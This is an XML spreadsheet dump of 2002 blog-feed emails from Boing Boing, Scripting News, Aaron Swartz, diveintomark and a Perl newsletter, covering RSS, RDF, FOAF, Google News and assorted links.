    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nJavawalk is a coffee-oriented walking-tour of San Francisco. \n\n    Javawalk is a two-hour walk in the city center. We start at Union Square \n    and wind through Chinatown, Jackson Square and North Beach, the city's \n    Italian district. While we cover the city's coffee roots (much more \n    significant than Seattle's!) and coffeehouse culture (think beatnik), we \n    also spend some time on San Francisco's history, interesting and arcane \n    trivia and stories the Javagirl has collected from many years of living in \n    the city. Truly, some things could only happen in SF! Javawalk also makes a \n    couple of stops at North Beach cafes for a quick java jolt. Since cool \n    weather prevails here, we need coffee year-round in the city by the Bay. \n    Lucky us!  \n\nLink[1] Discuss[2] (_Thanks, Paul!_)\n\n[1] [URL]http://www.javawalk.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.javawalk.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>New Google News</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nGoogle has seriously revamped Google News -- the system automatically gathers \ntoday's top stories and finds all the various coverage of them. It's really \nexcellent. Link[1] Discuss[2] (_Thanks, Nate!_)\n\n[1] [URL]http://news.google.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://news.google.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>Janis Ian interviewed on Slashdot</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nJanis Ian, a brave and talented recording artist (and budding and talented \nscience fiction writer) has done a terrific interview with the Slashdot \ngroupmind about her views on the music industry. \n\n    Seriously, diversity is something record companies can't afford anymore - \n    not the majors, at any rate. I'd go to this article, posted at Linux \n    Journal, which quotes a Newsweet article (July 15,2002) by Steven Levy \n    saying "So why are the record labels taking such a hard line? My guess is \n    that it's all about protecting their Internet-challenged business model. \n    Their profit comes from blockbuster artists. If the industry moved to a \n    more varied ecology, independent labels and artists would thrive--to the \n    detriment of the labels, which would have trouble rustling up the rubes to \n    root for the next Britney. The smoking gun comes from testimony of an \n    RIAA-backed economist who told the government fee panel that a dramatic \n    shakeout in Webcasting is "inevitable and desirable because it will bring \n    about market consolidation." That's really it in a nutshell. "Market \n    consolidation" means the less artists they have to promote, the less \n    ultimate dollars they'll spend. The smaller the playlist, the greater the \n    chance that audiences will buy something from that playlist alone - because \n    that's all you'll be able to find out there.  \n\nLink[1] Discuss[2]\n\n[1] [URL]http://slashdot.org[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://slashdot.org http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 24 Sep 2002 08:00:35 -0000</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 08:00:35 -0000</t>
  </si>
  <si>
    <t>RIP, Robert L Forward</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nRobert L Forward, a giant of hard science fiction, has died at 70 of brain \ncancer. Link[1] Discuss[2] (_Thanks, Michael[3]!_)\n\n[1] [URL]http://www.plokta.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://www.michaelbernstein.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.plokta.com http://www.quicktopic.com http://www.michaelbernstein.com</t>
  </si>
  <si>
    <t>Homeland Alert for the paranoid in you</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nHomeland Alert is an OS X app that puts a little beacon in your menubar, \ntelling you what the current nationwide alert status is -- just in case you \ndon't have enough free-floating anxiety in your life. Link[1] Discuss[2] (_\nThanks, Jon[3]!_)\n\n[1] [URL]http://www.exittoshell.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://www.talkstink.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.exittoshell.com http://www.quicktopic.com http://www.talkstink.com</t>
  </si>
  <si>
    <t>Goats with enormous testicles, and a life-sized cow sculpted from</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\n[IMG: [URL]http://jw.servebeer.com[/URL]] Jeff \nwrites: "Goats with enormous testicles, and a life-sized cow sculpted from \nbutter. Pictures from Massachusett's Eastern States Expo this weekend. Anyone \nknow the purpose of those overgrown goat gonads?" Link[1] Discuss[2] (_Thanks, \nJeff[3]!_) \n\n\n[1] [URL]http://jw.servebeer.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://jw.servebeer.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://jw.servebeer.com http://jw.servebeer.com http://www.quicktopic.com http://jw.servebeer.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 24 Sep 2002 08:00:34 -0000</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 08:00:34 -0000</t>
  </si>
  <si>
    <t>Was child beating mom an enraged con artist?</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nArticle about a scam expert who belives the mom who beat her child is a grifter \nbelonging to the Irish Travelers. The reason she beat up her little girl, he \nthinks, is becasue she was pissed that the kid blew her con at a toy store. \n\n    Wright believes the beating happened for one of two reasons. "The little \n    girl gave away the scam to an employee or the mom was so ticked off at not \n    getting refunds she took it out on the little girl." \n\nI don't know anything about the Irish Travelers, but I'm wondering if they are \ngetting a bad rap about being con-artists. This Irish Traveler FAQ[1] says \n"some Travellers are con men, but, just like other Americans, most are not." \nLink[2] Discuss[3]\n\n[1] [URL]http://www.pitt.edu[/URL]\n[2] [URL]http://www.wndu.com[/URL]\n[3] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.pitt.edu http://www.wndu.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>I'm on TV tonight</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nTonight on the Style Network's TV show "Area," my house will be featured \nundergoing a Hawaiiana makeover. Watch it and meet Carla, my daughter, and me. \nIt'll play Monday at 9:30 pm ET. (If someone can tape it for me, I'd appreciate \nit, because my cable service doesn't get the Style channel. I'll send you a new \nT-shirt iron on of a girl and her pet slug. Email mark@well.com.) Link[1] \nDiscuss[2]\n\n[1] [URL]http://www.stylenetwork.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.stylenetwork.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: scripting &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 24 Sep 2002 08:00:32 -0000</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 08:00:32 -0000</t>
  </si>
  <si>
    <t>Phil Wolff: Dave Winer books I'll buy. _Sweet! _</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: 1/1/1904; 12:00:00 AM\n\nPhil Wolff: Dave Winer books I'll buy[1]. _Sweet! _\n\n[1] [URL]http://dijest.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://dijest.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: scripting &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 24 Sep 2002 08:00:12 -0000</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 08:00:12 -0000</t>
  </si>
  <si>
    <t>News.Com: Google search gets newsier.</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Mon, 23 Sep 2002 15:47:06 GMT\n\nNews.Com: Google search gets newsier[1].\n\n[1] [URL]http://rss.com.com[/URL]</t>
  </si>
  <si>
    <t>Gold Lake Mountain Resort looks pretty gooood. Man there are a</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: 1/1/1904; 12:00:00 AM\n\nGold Lake Mountain Resort[1] looks pretty gooood. Man there are a lot of cool \nrelaxing places to stay in Colorado. Keep the suggestions coming. \n\n[1] [URL]http://www.goldlake.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://www.goldlake.com</t>
  </si>
  <si>
    <t>After posting my comment yesterday about next things I want to</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Mon, 23 Sep 2002 15:11:28 GMT\n\nAfter posting my comment yesterday about next things[1] I want to do, I'm \nstarting to get job offers. Hey I wasn't expecting that. But I like it I like \nit. Especially in this stinkin economy. On the other hand can you imagine _me_ \nwith a job? ";-&gt;"\n\n[1] [URL]http://scriptingnews.userland.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://scriptingnews.userland.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: scripting &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 24 Sep 2002 08:00:11 -0000</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 08:00:11 -0000</t>
  </si>
  <si>
    <t>Shelley Powers raises some interesting questions re whether RDF</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Mon, 23 Sep 2002 16:19:32 GMT\n\nShelley Powers raises[1] some interesting questions re whether RDF has a place \nin syndication. She says that RDF is trying to build a persistent database (aka \nthe Semantic Web) and RSS is trying to flow news that has a short lifespan. I \nhad not heard this point before. It's worth thinking about. \n\n[1] [URL]http://weblog.burningbird.net[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://weblog.burningbird.net</t>
  </si>
  <si>
    <t>I've been hearing a lot about FOAF, which is an acronym for</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Mon, 23 Sep 2002 17:34:18 GMT\n\nI've been hearing a lot about FOAF, which is an acronym for Friend Of A Friend. \nIt's an RDF-based file format that lets you walk a network of people who are \nfriends. It's a lot like a network of blogrolls[1]. \n\n[1] [URL]http://radio.outliners.com[/URL]$85</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://radio.outliners.com</t>
  </si>
  <si>
    <t>Google PR sends a message that they have a new News service.</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Mon, 23 Sep 2002 15:19:16 GMT\n\nGoogle PR sends a message that they have a new News service[1]. Maybe I'm slow \nthis morning, or maybe I'm spoiled, but what's the big deal. I thought they \nalready had this. My personal aggregator[2] is better, it shows me what I'm \ninterested in, it's not one size fits all. Help me figure this out. I'm sure \nthere's something innovative here, I just don't see it.\n\n[1] [URL]http://news.google.com[/URL]\n[2] [URL]http://radio.userland.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://news.google.com http://radio.userland.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: scripting &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 24 Sep 2002 08:00:10 -0000</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 08:00:10 -0000</t>
  </si>
  <si>
    <t>News.Com: "Amazon.com is hoping to use more than the honor system</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Mon, 23 Sep 2002 23:27:03 GMT\n\nNews.Com[1]: "Amazon.com is hoping to use more than the honor system to protect \na payment method it established online last year."\n\n[1] [URL]http://rss.com.com[/URL]</t>
  </si>
  <si>
    <t>NY Times piece on reporters with weblogs.</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Mon, 23 Sep 2002 15:24:12 GMT\n\nNY Times piece[1] on reporters with weblogs.\n\n[1] [URL]http://www.nytimes.com[/URL]</t>
  </si>
  <si>
    <t>Slashdot reports that Amazon still wants to patent the Web.</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Mon, 23 Sep 2002 15:30:51 GMT\n\nSlashdot reports[1] that Amazon still wants to patent the Web.\n\n[1] [URL]http://slashdot.org[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://slashdot.org</t>
  </si>
  <si>
    <t>Sheila Lennon was interviewed for the Times piece.</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Mon, 23 Sep 2002 15:25:14 GMT\n\nSheila Lennon was interviewed[1] for the Times piece.\n\n[1] [URL]http://www.lennon2.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://www.lennon2.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: scripting &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 24 Sep 2002 08:00:09 -0000</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 08:00:09 -0000</t>
  </si>
  <si>
    <t>Paul Everitt: Interop in the Bazaar.</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Mon, 23 Sep 2002 23:54:52 GMT\n\nPaul Everitt: Interop in the Bazaar[1].\n\n[1] [URL]http://advogato.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://advogato.com</t>
  </si>
  <si>
    <t>Halley: "When is someone going to create _audio fonts_ for</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Tue, 24 Sep 2002 01:16:41 GMT\n\nHalley[1]: "When is someone going to create _audio fonts_ for Christ's sake."\n\n[1] [URL]http://halleyscomment.blogspot.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://halleyscomment.blogspot.com</t>
  </si>
  <si>
    <t>CNN Headline News: To Blog or not to Blog.</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Mon, 23 Sep 2002 22:56:54 GMT\n\nCNN Headline News: To Blog or not to Blog[1].\n\n[1] [URL]http://www.cnn.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://www.cnn.com</t>
  </si>
  <si>
    <t>Ed Cone: "I told my grandmother goodbye."</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Tue, 24 Sep 2002 04:11:14 GMT\n\nEd Cone[1]: "I told my grandmother goodbye."\n\n[1] [URL]http://radio.weblogs.com[/URL]</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: scripting &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 24 Sep 2002 08:00:08 -0000</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 08:00:08 -0000</t>
  </si>
  <si>
    <t>Jeremy Zawodny who works at Yahoo Finance offers an RSS 0.91 feed</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Mon, 23 Sep 2002 19:45:28 GMT\n\nJeremy Zawodny[1] who works at Yahoo Finance offers an RSS 0.91 feed for every \nstock. It's a beta feature. Here's the feed for Microsoft[2] and one for \nMarimba[3]. Thanks to Jon Udell[4] for the pointer. Nice. Jon also notes that \nMicrosoft doesn't show up too strong in the weblog world and describes[5] a \nconversation with John Montgomery about this. What a small world. John and I \ngot to know each other when we did the work on SOAP in the late 90s, and weblog \nsoftware is one of the major reasons we were interested in SOAP. So close, but \nso far. But it's never too late!\n\n[1] [URL]http://jeremy.zawodny.com[/URL]\n[2] [URL]http://rss.finance.yahoo.com[/URL]\n[3] [URL]http://rss.finance.yahoo.com[/URL]\n[4] [URL]http://weblog.infoworld.com[/URL]\n[5] [URL]http://weblog.infoworld.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://jeremy.zawodny.com http://rss.finance.yahoo.com http://rss.finance.yahoo.com http://weblog.infoworld.com http://weblog.infoworld.com</t>
  </si>
  <si>
    <t>"rssflowersalignright"I've gotten to know Phil Ringalda over the</t>
  </si>
  <si>
    <t>URL: [URL]http://scriptingnews.userland.com[/URL]\nDate: Tue, 24 Sep 2002 03:59:58 GMT\n\n"rssflowersalignright"I've gotten to know Phil Ringalda over the last few weeks \nin all the discussions about RSS 2.0, and I like him, and would like to work \nwith him in the future. I don't say that lightly. This evening he posted a note\n[1] on his weblog that he was giving up trying to get RDF to make sense inside \nRSS. As I read his essay I could feel two-plus years of exhaustion overwhelm \nme. I found myself writing a comment after his essay saying, among other things \n"RSS is not a brilliant format. It is a compromise. It is for syndicating news \nfeeds. That's all it is for, for the 18,000th time." It's time for RDF to pack \nits bags and leave. RSS deserves some dignity, as does RDF. Emphatically, once \nand for all, they are not the same thing. Peace be with you RDF. Leave RSS \nalone. Thank you.\n\n[1] [URL]http://philringnalda.com[/URL]</t>
  </si>
  <si>
    <t>http://scriptingnews.userland.com http://philringnalda.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: aaronsw &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 24 Sep 2002 08:00:06 -0000</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 08:00:06 -0000</t>
  </si>
  <si>
    <t>Feeling Lucky</t>
  </si>
  <si>
    <t>URL: [URL]http://www.aaronsw.com[/URL]\nDate: 2002-09-23T00:51:21-06:00\n\nI've received an _incredibly kind invitation_; I sure hope I can take it! I \nfeel sort of bad though, because I think other people deserve it more than I \ndo. \n\nHm, the next few weeks are pretty crazy: \n\n*Thu 26:* Edward Tufte Course[1] and MSI[2] member's night, Chicago.\n*Fri 27:* OSCOM[3], Berkeley. Bookmobile launch[4], SF. _(Unlikely to attend.)_\n*SatSun:* Hoshana Rabba, Shemini Atzeret, Simchat Torah. _(Jewish Holidays)_\n*30-Oct3:* OSXCON[5], Santa Clara. _(Need someplace to stay. Anyone?)_\n*Mon 7:* Bernstein's oral argument in crypto export case[6], San Francisco. _\n(Ditto.)_\n*Tues 8:* Bookmobile[7] arrives in D.C.\n*Wed 9:* Lessig's oral argument in Eldred case[8], D.C.\n\n\n\n[1] [URL]http://www.edwardtufte.com[/URL]\n[2] [URL]http://msichicago.org[/URL]\n[3] [URL]http://www.oscom.org[/URL]\n[4] [URL]http://webdev.archive.org[/URL]\n[5] [URL]http://conferences.oreillynet.com[/URL]\n[6] [URL]http://export.cr.yp.to[/URL]\n[7] [URL]http://webdev.archive.org[/URL]\n[8] [URL]http://eldred.cc[/URL]</t>
  </si>
  <si>
    <t>http://www.aaronsw.com http://www.edwardtufte.com http://msichicago.org http://www.oscom.org http://webdev.archive.org http://conferences.oreillynet.com http://export.cr.yp.to http://webdev.archive.org http://eldred.cc</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: aaronsw &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 24 Sep 2002 08:00:05 -0000</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 08:00:05 -0000</t>
  </si>
  <si>
    <t>TRAMP Update</t>
  </si>
  <si>
    <t>URL: [URL]http://www.aaronsw.com[/URL]\nDate: 2002-09-23T23:21:12-06:00\n\nFinally finished up (most of) TRAMP, my RDF interface for Python. (If you don't \nuse RDF or Python you can probably safely skip this entry.)  \n\nNew in this version: RDF library abstraction (because rdflib's organization \ncurrently sucks), write values in addition to reading, and unit tests, all with \nthat old TRAMP flavor you've come to know and love.  \n\n_But wait,_ it also comes with an entire page of explanation/advertisement[1] \nif you're not already convinced.\n\n\n\n    RDF/XML got you down? Tired of having to go through contortions to deal \n    with data? Want to write Python and be standards-compatible at the same \n    time? Need a module to implement the psuedo-code you had on your slides? *\n    TRAMP may or may not be the answer to these problems!*\n\n\n\nEnjoy, and get a free bonus prize if you can tell me[2] why it's called TRAMP.\n\n\n\n[1] [URL]http://www.aaronsw.com[/URL]\n[2] mailto:me@aaronsw.com</t>
  </si>
  <si>
    <t>http://www.aaronsw.com http://www.aaronsw.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: diveintomark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 24 Sep 2002 08:00:03 -0000</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 08:00:03 -0000</t>
  </si>
  <si>
    <t>The Semantic Web makes me sick</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-09-23T09:27:30-05:00\n\nNo, really. My sinus infection, which appeared to be gone, flared up again over \nthe weekend in the nastiest way, and I am now coughing up dark mucus and doing \nother things that probably don't bear repeating in a public forum. I have the \n10:15 doctor's appointment that I should have made last round, had I not \nconvinced myself that &amp;#8220;it's not that bad&amp;#8221; and trudged through it \nall without prescription drugs. I'm not making the same mistake this time. I'll \nbe back this afternoon. \n\nMy email problems of yesterday have been resolved. You can once again reach me \nat my normal address, f8dy@diveintomark.org. \n\nKevin Burton[1] emailed me with another way to link to a FOAF file from my RSS \nfeed. It looks easier than previous suggestions, and it has the advantage of \nbeing able to use it from an RSS 1.0 or 2.0 feed, but I worry about all these \nvariations. Just as in real life, where people can use different words that \nmean essentially the same thing, in the Semantic Web programs can use different \nvocabularies to express the same statements. That's great for producers, not so \ngreat for consumers who have to make sense of it all. \n\nFor each domain (RSS feeds, FOAF files, whatever), somebody (or some group) \nneeds to come along and document best practices. We need better _goal-oriented_ \ndocumentation. We have a lot of reference documentation, task-oriented \ndocumentation, but very little that documents that larger picture and answers \nquestions written in English. &amp;#8220;How do I include personal information in \nmy RSS feed?&amp;#8221; is a goal-oriented question. &amp;#8220;Create a FOAF file \nusing this tool and then insert this line at this location in your RSS \nfeed&amp;#8221; (with as many examples as necessary) is a goal-oriented answer. \nAnything less is like trying to master a foreign language by reading a \ndictionary.\n\n\n\n[1] [URL]http://www.peerfear.org[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://www.peerfear.org</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: diveintomark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 24 Sep 2002 08:00:02 -0000</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 08:00:02 -0000</t>
  </si>
  <si>
    <t>New toys</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-09-23T16:50:42-05:00\n\n_Shelley Powers_: &amp;#8220;I thought the stuff this weekend on FOAF was a joke[1]\n&amp;#8212;a bunch of people playing with new toys. ... How does FOAF aid \naggregation? The author is included with each bit. Why do we need extraneous \nmaterial such as college, and who the author knows?&amp;#8221; \n\n_Seth Russell_: &amp;#8220;For example I wanted to know who _you_ were[2]. Only \nthing I had was your posts to this list. So i found "burningbird.net" in your \nemail address ... then i did a lot of reading over there. Still don't really \nknow who your are and what you are into, what projects you are working on, who \nyou know, and why you came here to run your mouth. But if there were a foaf \nbutton on the feed from this channel, well I just click on that and i'm totally \ninto your stuff.&amp;#8221;\n\n\n\n[1] [URL]http://groups.yahoo.com[/URL]\n[2] [URL]http://groups.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://groups.yahoo.com http://groups.yahoo.com</t>
  </si>
  <si>
    <t>Now heavily medicated</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-09-23T16:11:02-05:00\n\nTrust me when I tell you that heavy medication and RDF do not mix. Here is a \nlist of things I intend to re-read once the fog lifts: \n\n- _Phil Ringnalda_: Using FOAF relationships[1] and Just say no to Trackback in \nindex.html[2]. \n- _Les Orchard_: Per-post comment RSS feed[3]. \n- _Phil Wainewright_: The bare necessities of RSS[4] and What to do about RDF\n[5]. The beginning of an RSS 2.0 best practices document. \n- _Jonathon Delacour_: Trying to score a goal[6]. &amp;#8220;As the best and the \nbrightest focus on the possibilities of FOAF, I turned my attention to \nyesterday's news: RSS.&amp;#8221; No, RSS will always be today's news. Get it? \nToday's newzzz... Never mind. \n- Comments on Ben Hammersley's Friend of a Friend[7]. Various ways to link to a \nFOAF file from an RSS feed. \n- _Nicholas Chase_: The Web's future: XHTML 2.0[8]. We're losing backward \ncompatibility, isn't that great? Well, he seems to think so. \n- mod_cc[9], a module for including copyright information in RDF documents such \nas RSS 1.0 feeds, and, I hope, FOAF files. \n- _Shelley Powers_: Who is your audience, and what are you trying to \naccomplish?[10] Addressing the growing identity crisis on the RSS-DEV mailing \nlist[11]. Also the comments on Shelley's article[12]. \n- _Ian Hickson_: Pingback 1.0[13]. &amp;#8220;The best thing about this idea is \nthat unlike similar schemes like TrackBack, it is totally transparent to both \nusers.&amp;#8221; \n- New software helps in building of accessible web sites[14]. A press release \nfor a new edition of LIFT[15], which I have never used. \n- Forget Mars bars, Twinkies now the deep-fried treat[16]. &amp;#8220;The secret to \nmaking a deep-fried Twinkie, he says, is to place it in the fridge first to \ngive it more stability. He then rolls it in flour, covers it with batter ... \nand plunks it into the oil.&amp;#8221; \n\n\n\n\n\n[1]  [URL]http://philringnalda.com[/URL]\n[2]  [URL]http://philringnalda.com[/URL]\n[3]  [URL]http://www.decafbad.com[/URL]\n[4]  [URL]http://howto.looselycoupled.com[/URL]\n[5]  [URL]http://howto.looselycoupled.com[/URL]\n[6]  [URL]http://weblog.delacour.net[/URL]\n[7]  [URL]http://rss.benhammersley.com[/URL]\n[8]  [URL]http://www-106.ibm.com[/URL]\n[9]  [URL]http://web.resource.org[/URL]\n[10] [URL]http://weblog.burningbird.net[/URL]\n[11] [URL]http://groups.yahoo.com[/URL]\n[12] [URL]http://burningbird.net[/URL]\n[13] [URL]http://ln.hixie.ch[/URL]\n[14] [URL]http://maccentral.macworld.com[/URL]\n[15] [URL]http://www.usablenet.com[/URL]\n[16] [URL]http://www.globeandmail.com[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://philringnalda.com http://philringnalda.com http://www.decafbad.com http://howto.looselycoupled.com http://howto.looselycoupled.com http://weblog.delacour.net http://rss.benhammersley.com http://www-106.ibm.com http://web.resource.org http://weblog.burningbird.net http://groups.yahoo.com http://burningbird.net http://ln.hixie.ch http://maccentral.macworld.com http://www.usablenet.com http://www.globeandmail.com</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: "Russell Turpin" &lt;deafbox@hotmail.com&gt;\nDate: Tue, 24 Sep 2002 02:00:58 +0000</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 02:00:58 +0000</t>
  </si>
  <si>
    <t>Re: Goodbye Global Warming</t>
  </si>
  <si>
    <t>Mr. FoRK:\n&gt;Of the three lying politicians, which liar would you take?\n\nNo, no. The riddle is, asking only one question, how\ndo you determine which is which? "If I were to ask\nyou whether he would say you were a crook, or if the\nother had sex ..?"\n\n\n\n\n\n_________________________________________________________________\nSend and receive Hotmail on your mobile device: [URL]http://mobile.msn.com[/URL]</t>
  </si>
  <si>
    <t>http://mobile.msn.com</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Tue, 24 Sep 2002 02:00:34 +0000</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 02:00:34 +0000</t>
  </si>
  <si>
    <t>[use Perl] Stories for 2002-09-24</t>
  </si>
  <si>
    <t>use Perl Daily Newsletter\n\nIn this issue:\n    * This Week on perl5-porters (16-22 September 2002)\n    * The Great Perl Monger Cull Of 2002\n\n+--------------------------------------------------------------------+\n| This Week on perl5-porters (16-22 September 2002)                  |\n|   posted by rafael on Monday September 23, @07:58 (summaries)      |\n|   [URL]http://use.perl.org[/URL]               |\n+--------------------------------------------------------------------+\n\nThat's on a week like this that you realize that lots of porters are\nEuropean (and managed to free themselves for YAPC::Europe.) Or were they,\non the contrary, too busy in the big blue room ? On the other hand, the\nnumber of bug reports stayed at its habitual average level.\n\nThis story continues at:\n    [URL]http://use.perl.org[/URL]\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\n\n+--------------------------------------------------------------------+\n| The Great Perl Monger Cull Of 2002                                 |\n|   posted by ziggy on Monday September 23, @16:38 (news)            |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\n[0]davorg writes "If you take a look at [1]list of local groups on the\n[2]Perl Mongers web site, you'll see that it's just got a good deal\nshorter. Over the last month or so, I've been making strenuous efforts to\ncontact all of the groups we had listed to see which ones were still\nactive. What you see is the result of this exercise. Almost half of the\ngroups have been removed because they haven't responded to my emails.\n\nIf your local group still exists but is no longer listed, then that means\nthat I don't have an update to date contact for your group. Please [3]let\nme know if that's the case."\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. mailto:dave@dave.org.uk\n    1. [URL]http://www.pm.org[/URL]\n    2. [URL]http://www.pm.org[/URL]\n    3. mailto:user_groups@pm.org\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 http://use.perl.org http://use.perl.org http://www.pm.org http://www.pm.org http://use.perl.org</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Tue, 24 Sep 2002 02:00:25 +0000</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 02:00:25 +0000</t>
  </si>
  <si>
    <t>[use Perl] Headlines for 2002-09-24</t>
  </si>
  <si>
